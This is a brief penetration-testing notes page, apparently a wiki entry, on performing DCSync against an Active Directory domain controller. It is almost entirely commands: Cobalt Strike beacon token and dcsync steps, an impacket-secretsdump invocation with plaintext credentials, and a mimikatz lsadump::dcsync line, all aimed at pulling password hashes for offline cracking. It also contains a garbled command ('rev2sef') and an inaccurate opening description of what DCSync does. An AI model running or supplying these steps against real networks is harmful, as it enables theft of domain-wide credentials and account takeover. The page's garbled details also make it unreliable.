Page cover image

DCSync

DCSync is used to verify that the hash found can be easily cracked. The easiest way is through the Beacon in C2.

Steps

First you need to add the creds to the credentials in C2. Then you can run the following command:

beacon > make_token DOMAIN\user Pass

beacon > ls \\DC IP\C$

^ Use this to confirm that is correct. Now we should have a token! We can DCSync.

beacon > dcsync domain\user

If this is run correctly then you should receive the hash to be pulled and cracked offline

If this does not work, then we will need to pivot over to impacket-secretsdump, here we can try and pull this data

$ impacket-secretsdump --outfile FILENAME.txt domain/user:password@<DCIP>

$ rev2sef - this clears out the token we created

Mimikatz DCSync

Notes: Run this in the same CMD session witht he imported tgt ticket

$ mimikatz.exe lsadump::dcsync /domain:example.com /user:useraccount@example.com

Last updated